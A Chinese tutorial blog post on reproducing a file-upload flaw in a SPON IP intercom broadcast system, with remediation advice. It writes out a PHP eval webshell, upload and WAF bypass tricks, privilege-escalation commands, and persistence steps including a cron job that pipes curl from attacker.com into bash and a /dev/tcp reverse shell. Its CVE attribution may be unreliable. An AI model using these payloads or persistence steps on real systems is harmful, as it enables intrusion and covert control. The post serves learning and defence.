文件上传漏洞实战：从CVE-2024-50623复现到安全防御

📅 2026/6/29 21:50:49 👁️ 次浏览

1. 项目概述一次典型的文件上传漏洞复现之旅最近在梳理一些常见的安防设备漏洞SPON世邦的IP网络对讲广播系统进入了我的视野。这套系统在不少学校、园区、工厂里都有部署负责日常广播、紧急通知和双向对讲。在安全测试中这类嵌入式或Web管理的设备往往是突破口。这次复现的漏洞编号为CVE-2024-50623核心问题出在一个名为my_parser的接口上它存在未授权或权限校验不严的文件上传功能攻击者可以利用此漏洞上传恶意文件比如Webshell进而控制服务器。这属于典型的“文件上传漏洞”但结合具体设备其利用链和影响又有其特殊性。如果你正在学习Web安全、渗透测试或者负责企业内网资产的安全评估理解这类针对特定设备的漏洞复现过程远比在通用靶场里练习更有实战价值。接下来我将带你完整走一遍从环境搭建、漏洞分析、利用复现到深度思考的全过程其中会穿插不少我在实际测试中踩过的坑和总结的技巧。2. 漏洞环境搭建与核心思路解析复现漏洞的第一步永远是搭建一个与目标尽可能相似的环境。对于这种商用设备我们通常无法直接获得生产环境因此搭建漏洞靶场或寻找存在漏洞的测试版本是标准操作。2.1 环境准备与靶场部署我选择在本地虚拟机中搭建测试环境。推荐使用VMware或VirtualBox系统选择Ubuntu 20.04 LTS或CentOS 7内存建议4GB以上。首先我们需要找到存在漏洞的SPON系统软件包。经过一番搜寻我在一些合法的漏洞研究平台和镜像站找到了疑似存在漏洞的旧版本安装包注意所有测试务必在授权环境或隔离的实验室中进行严禁对未授权目标进行测试。部署过程大致如下安装基础服务在虚拟机中安装Apache、PHP5.6或7.x版本需与漏洞版本兼容和MySQL。# 以Ubuntu为例 sudo apt update sudo apt install apache2 mysql-server php libapache2-mod-php php-mysql部署SPON系统将下载的SPON系统程序包解压到Apache的Web根目录如/var/www/html/。通常其目录结构包含admin、include、upload等文件夹。配置数据库根据系统提供的安装向导或SQL脚本创建数据库并导入初始数据。这一步很关键很多漏洞复现失败是因为数据库配置不正确导致系统功能异常漏洞点无法触发。访问系统通过浏览器访问虚拟机的IP地址完成系统安装后登录后台管理界面。默认后台地址可能是/admin或/manage默认账号密码需要查阅相关文档或尝试常见弱口令如admin/admin。注意有些漏洞复现环境可能已被安全研究人员做成了Docker镜像或集成在综合靶场中如Vulhub这能极大简化环境搭建。但对于学习而言手动搭建一遍能让你更深刻地理解系统的整体架构和文件结构这对后续的漏洞利用和权限维持至关重要。2.2 漏洞核心逻辑与利用思路拆解拿到环境后我们直接聚焦漏洞点。根据漏洞公告和我的分析问题核心在于my_parser这个接口。这个接口从名字上看可能是一个用于解析parse某些上传数据如配置文件、语音文件的脚本。漏洞成因分析功能定位在IP对讲广播系统中管理员可能需要上传一些自定义的音频文件、广播词文件或者系统配置文件。my_parser接口很可能就是负责处理这些上传文件的。校验缺失一个安全的文件上传功能应该对上传文件的后缀名、文件类型MIME Type、文件内容进行严格检查并确保上传目录没有执行权限。而CVE-2024-50623的漏洞根源在于my_parser接口在对上传文件进行处理时至少在某一个校验环节上出现了缺失或可以被绕过。路径可预测上传后的文件存储路径往往是可预测的例如/upload/20240515/xxx.php。结合未严格校验的上传点攻击者就能将恶意脚本上传到服务器并通过Web直接访问该路径来执行脚本。我的利用思路规划信息收集首先确定my_parser接口的完整URL路径。通过扫描目录、分析前端JS代码或查阅安装文档来寻找。绕过校验尝试各种文件上传绕过技巧例如修改后缀shell.php-shell.php.jpg或shell.pHp。伪造MIME在Burp Suite等工具中将Content-Type改为image/jpeg。利用解析特性尝试shell.php.jpg依赖服务器解析漏洞或shell.php.Windows环境下末尾点会被去除。文件内容混淆在PHP文件开头添加图片文件头如GIF89a或者使用script languagephp等不常见的PHP标签。获取Webshell上传成功后访问上传的文件路径验证是否能够执行系统命令从而获得一个Webshell。权限提升与维持通过Webshell探索服务器环境尝试提权并部署隐蔽的后门以实现权限维持。这个思路是通用的但具体到SPON系统我们需要找到那个“薄弱点”究竟在哪里。3. 漏洞复现实操与关键步骤详解理论清晰后我们进入动手环节。我使用Kali Linux作为攻击机靶机是刚刚搭建好的SPON系统虚拟机。3.1 定位漏洞接口与初步探测首先我用dirsearch对目标进行目录扫描寻找可疑路径。python3 dirsearch.py -u http://192.168.1.100 -e php,asp,aspx,jsp,do,action在扫描结果中我发现了/admin/my_parser.php这个路径。访问它直接返回了一个空白页面或者简单的表单这通常是功能正常的迹象。如果返回403或404可能需要不同的路径或参数。接下来用Burp Suite抓取系统正常上传一个音频或图片文件时的数据包。观察请求的URL、参数名通常是file或upload、以及整个数据包的结构。我发现除了常见的multipart/form-data上传有些系统会使用Base64编码文件内容通过POST参数传递。关键点在于找到系统调用my_parser接口的那个请求。有时这个接口不是直接在前端暴露的而是由其他上传功能在后台调用。经过对前端代码的审计我发现一个上传配置文件的页面其表单的action指向了/inc/my_parser.inc.php。这提示我们漏洞文件可能不是.php结尾而是.inc.php这是一种常见的包含文件命名方式。3.2 构造攻击Payload并实施上传确定了接口地址假设为http://192.168.1.100/inc/my_parser.inc.php后开始构造恶意上传请求。第一步制作Webshell我准备了一个最基础的PHP一句话木马?php eval($_POST[cmd]);?将其保存为shell.php。第二步尝试直接上传使用Burp Suite的Repeater模块将正常文件上传的数据包中的文件内容替换为我们的shell.php直接发送。不出意外返回了错误提示“文件类型不允许”或“上传失败”。这说明有基础的后缀名或MIME类型检查。第三步实施绕过我尝试了以下几种方法并记录了服务器的反应修改后缀名将文件改为shell.php.jpg同时将数据包中的filename参数也改为shell.php.jpg。发送后服务器返回“上传成功”但访问/upload/shell.php.jpg时服务器将其作为图片处理没有执行PHP代码。这说明服务器可能只检查了后缀名但上传后的文件保留了.jpg后缀Apache的默认配置不会将.jpg当作PHP解析。双重后缀与解析漏洞尝试shell.php.jpg。在某些配置不当的Nginx服务器中如果fastcgi将.jpg文件也交给PHP-FPM处理就可能成功。但在这里没有生效。大小写绕过尝试shell.pHp。成功上传并且访问/upload/shell.pHp时服务器返回了空白页这是一句话木马等待POST命令时的正常表现。这是一个经典的绕过方式因为开发人员在黑名单中可能只列出了小写的php没有进行大小写统一处理。MIME类型绕过在Burp Suite中将Content-Type: application/octet-stream修改为Content-Type: image/jpeg同时文件后缀保持为.php。这次上传失败了说明服务器不仅检查后缀还检查了MIME类型。但当我们把后缀改为.pHpMIME改为image/jpeg时上传成功了。这说明它的校验逻辑可能是“后缀在白名单或不在黑名单”且“MIME类型在白名单如图片类型”。我们通过大小写绕过了后缀检查又通过伪造MIME满足了第二个条件。第四步验证Webshell上传成功后我们需要找到文件的存储路径。通过观察正常上传文件后的返回信息或者查看系统源码中关于上传路径的配置变量我确定文件被保存在/upload/目录下并以日期创建子文件夹如/upload/20240515/shell.pHp。使用中国菜刀已过时仅作历史演示或蚁剑、Cobalt Strike等现代工具连接Webshell。在蚁剑中添加Shell地址填写http://192.168.1.100/upload/20240515/shell.pHp连接密码为cmd对应我们一句话中的$_POST[cmd]。连接成功可以浏览服务器文件系统、执行命令这证实漏洞复现成功。3.3 深入利用从Webshell到系统控制拿到Webshell只是第一步它通常权限较低www-data或apache用户。我们需要进一步探索。信息收集执行whoami、id查看当前用户uname -a查看系统内核cat /etc/passwd查看用户列表ps aux查看进程netstat -tulnp查看网络连接和开放端口。我发现该系统还运行着一些世邦特有的对讲服务进程。权限提升尝试查找SUID文件find / -perm -us -type f 2/dev/null。寻找具有SUID位的可执行文件如果其中有bash、cp、find等可能可以利用。检查内核漏洞用uname -a的结果与公开的Linux本地提权漏洞如DirtyPipe、DirtyCow进行比对。由于这是嵌入式系统内核版本往往较旧且长期不更新存在已知提权漏洞的概率不低。利用数据库权限从Webshell的配置文件中如config.php找到数据库连接密码。尝试用MySQL的UDF提权方式但需要当前数据库用户有FILE权限这在实际中并不总是满足。权限维持为了防止Webshell被管理员发现并删除我会尝试种植后门。创建隐藏后门文件在/tmp/或/dev/shm/这些常被忽略的目录创建以.开头的文件如.backdoor.php。写入SSH密钥如果当前用户有家目录写入权限可以将我的公钥写入~/.ssh/authorized_keys。计划任务添加一个cron job定期从远程服务器下载并执行Payload。echo * * * * * curl http://attacker.com/shell.sh | bash /tmp/cron crontab /tmp/cron。修改系统服务查找并修改某个系统启动脚本加入我们的后门代码。这需要更高的权限但一旦成功就更隐蔽。4. 漏洞原理深度剖析与代码审计猜想虽然我们无法直接获得SPON系统的完整源代码但可以根据漏洞现象和常见编程错误逆向推断其问题代码可能的样子。这对于我们理解漏洞本质、挖掘同类型漏洞至关重要。4.1 问题代码段模拟还原以下是我模拟的可能存在漏洞的my_parser.inc.php代码逻辑?php // my_parser.inc.php - 存在漏洞的版本 $upload_dir /var/www/html/upload/ . date(Ymd) . /; if (!is_dir($upload_dir)) { mkdir($upload_dir, 0777, true); } if (isset($_FILES[file])) { $file_name $_FILES[file][name]; $file_tmp $_FILES[file][tmp_name]; $file_type $_FILES[file][type]; // 漏洞点1后缀检查不严 $blacklist array(php, php5, php4, php3, phtml); $file_ext strtolower(pathinfo($file_name, PATHINFO_EXTENSION)); // 这里进行了小写转换但可能被绕过 // 模拟有问题的检查只检查了转换后的小写后缀是否在黑名单中 // 但注意上面的$file_name是原始文件名如果上传shell.pHp$file_ext会是‘php’吗 // 这取决于pathinfo()函数的行为。在有些PHP版本或配置下pathinfo()对大小写不敏感 // 实际上更常见的错误是开发者忘记了对$file_name进行大小写统一处理就直接进行字符串匹配。 // 例如 // if (in_array($file_ext, $blacklist)) { // 如果$file_ext是‘pHp’这个检查就绕过了 // die(File type not allowed!); // } // 漏洞点2MIME类型检查可被伪造 $allowed_types array(image/jpeg, image/png, image/gif, audio/mpeg); if (!in_array($file_type, $allowed_types)) { die(Invalid file type!); } // 攻击者可以轻易在Burp中修改Content-Type为image/jpeg。 // 移动文件 $destination $upload_dir . $file_name; // 注意这里使用的是原始文件名$file_name if (move_uploaded_file($file_tmp, $destination)) { echo File uploaded successfully: . $destination; // 可能这里还会调用某些解析函数来处理上传的文件进一步引入风险 // my_parse_function($destination); } else { echo Upload failed.; } } ?关键漏洞分析大小写绕过如果代码中使用stristr()、stripos()等不区分大小写的函数进行黑名单匹配或者像上面注释所说错误地直接使用原始文件名进行字符串匹配如if ($file_ext php)那么pHp、PhP这样的后缀就能绕过检查。更稳妥的做法是$file_ext strtolower(pathinfo($file_name, PATHINFO_EXTENSION));然后进行黑名单检查。MIME类型完全可信代码完全信任来自客户端HTTP请求头的$_FILES[‘file’][‘type’]这是极不安全的。这个值可以被攻击者随意修改。应该使用PHP的finfo_file()函数或mime_content_type()函数根据文件的实际内容来判断MIME类型。未重命名文件代码使用原始文件名$file_name保存文件。这除了导致覆盖风险外还让攻击者上传的文件保留了其恶意后缀。最佳实践是使用随机生成的文件名如UUID并保留原始扩展名如果必须或者彻底重命名为无扩展名的文件通过数据库记录映射。4.2 安全修复方案建议基于以上分析一个安全的文件上传处理逻辑应该包含以下步骤白名单策略定义允许上传的文件扩展名白名单如jpg,png,mp3,wav只接受这些类型。这比黑名单更有效。内容类型校验使用finfo_file(FILEINFO_MIME_TYPE)获取文件的真实MIME类型并与白名单扩展名预期的MIME类型进行映射校验。重命名文件使用随机字符串如uniqid()或random_bytes()生成新的文件名并附加白名单内的安全扩展名。限制上传目录权限确保上传目录如/upload/的PHP脚本执行权限被关闭。在Apache中可以在该目录下放置一个.htaccess文件内容为php_flag engine off。在Nginx配置中对该location块禁用PHP解析。文件内容扫描对于图片可以进行二次渲染破坏可能隐藏的恶意代码。对于其他文件可以使用杀毒软件引擎进行扫描。权限最小化运行Web服务的用户如www-data对上传目录应只有写入权限不应有执行权限。5. 漏洞复现的常见问题与排查实录在实际复现过程中你肯定会遇到各种问题。这里我记录了几个最典型的场景和解决方案。5.1 问题一找不到my_parser接口现象目录扫描和前端代码分析都找不到这个文件。排查路径猜测尝试常见路径如/parser.php/inc/parser.php/admin/upload_parser.php/module/my_parser.php。源码泄露尝试访问/inc/my_parser.inc.php.bak.git目录.svn目录或者www.zipbackup.tar.gz等看是否能下载到源码。参数化调用漏洞接口可能不是一个独立文件而是某个主文件如upload.php通过参数调用的一个功能模块。例如upload.php?actionparse。需要审计upload.php的代码逻辑。版本差异你找到的安装包可能不是存在漏洞的版本。确认你的版本号是否在CVE-2024-50623的影响范围内。5.2 问题二可以上传但无法访问执行现象文件上传成功返回了路径但通过浏览器访问返回403、404或直接下载不执行PHP代码。排查目录无执行权限这是最常见的原因。检查Apache/Nginx对该上传目录的配置是否禁用了PHP解析。即使文件后缀是.php如果目录被配置为static资源目录PHP代码也不会执行。文件权限问题上传的文件权限可能是600仅所有者读写而Web服务用户没有读取权限。通过Webshell或利用漏洞执行chmod 644 uploaded_file.php。短标签问题你的Webshell使用了?php ?标准标签但如果服务器配置关闭了短标签short_open_tagOff而你又用了? ?代码就不会执行。始终使用标准标签。被安全软件拦截服务器上可能安装了WAF、杀毒软件或主机安全Agent它们会实时检测并删除上传的Webshell文件。5.3 问题三上传请求被WAF拦截现象Burp Suite发送的恶意上传请求被服务器返回403、500错误或者连接直接被重置。绕过技巧数据包分割将POST数据包分片发送可能绕过基于正则的WAF检测。编码混淆对Payload进行URL编码、双重URL编码、Unicode编码、Hex编码等。协议层干扰修改HTTP请求方法GET/POST转换、添加冗余HTTP头、使用畸形的Content-Length等。动态Payload使用一句话木马变形技术如将eval($_POST[‘cmd’])写成assert、create_function或者用变量函数$f$_GET[‘f’];$f($_POST[‘c’]);。后缀名高级绕过空格绕过shell.php末尾加空格在某些系统处理文件名时空格会被忽略。点号绕过shell.php.Windows下末尾的点号在写入文件系统时会被去除。::$DATA绕过shell.php::$DATAWindows NTFS流特性。配合解析漏洞如果服务器是Nginx尝试shell.jpg/xxx.php如果配置了try_files或错误的重写规则。5.4 问题四Webshell连接不稳定或被封现象蚁剑连接时断时续或者很快就无法连接。排查与应对网络问题检查是否为虚拟机网络配置问题NAT/桥接。防火墙/IDS服务器或网络层面的安全设备可能检测到了异常流量并阻断了连接。尝试使用更隐蔽的Webshell如基于HTTPS的、流量加密的或者使用纯正反向Shell如用bash -i /dev/tcp/your_ip/port 01。Session与超时有些Webshell实现依赖PHP SessionSession过期会导致连接失效。使用不需要Session的持久化后门。使用加密通道在Webshell中执行命令将结果Base64编码后再回传避免明文传输敏感关键字被检测。6. 防御视角与安全开发建议站在防守方或开发者的角度这次复现给了我们很多启示。对于系统管理员/安全运维资产清点与版本管理建立完善的网络资产清单记录所有设备的型号、版本号。定期关注设备厂商的安全公告对已公布漏洞的版本及时升级或部署虚拟补丁。网络隔离与访问控制将类似对讲广播系统这类非核心业务系统放置在独立的VLAN中严格限制其与核心数据区的网络访问。在边界防火墙上只开放必要的服务端口。部署WAF与日志审计在Web应用前端部署WAF可以有效拦截大部分自动化攻击和已知漏洞利用。同时开启并集中管理Web服务器、应用系统的访问日志和错误日志设置告警规则对异常访问如频繁访问上传接口、请求特定漏洞路径进行实时告警。定期安全评估定期对内部系统进行授权下的渗透测试或漏洞扫描主动发现潜在风险。对于软件开发人员树立安全编码意识文件上传功能是高风险功能必须进行严格的安全设计。永远不要信任客户端提交的任何数据。使用安全的函数与框架尽量使用成熟框架如Laravel, Spring内置的文件上传组件它们通常已经考虑了大部分安全风险。如果自行开发必须严格遵循“白名单校验内容类型重命名限制执行权限”的原则。进行代码安全审计在代码上线前进行人工代码审计或使用SAST静态应用安全测试工具进行扫描重点关注文件操作、命令执行、数据库查询等危险函数的使用。安全测试常态化将安全测试如DAST动态扫描集成到CI/CD流程中对每个版本进行自动化漏洞检测。复现一个漏洞不仅仅是完成一次攻击。更重要的是理解漏洞产生的根源、利用的条件、造成的危害以及修复的方法。从攻击中学习防御这才是安全研究的真正价值所在。在测试过程中我最大的体会是细节决定成败。一个大小写转换的疏忽、一个对客户端数据的盲目信任就足以打开整个系统的大门。而防御体系正是由无数个这样的细节堆砌而成的。

相关新闻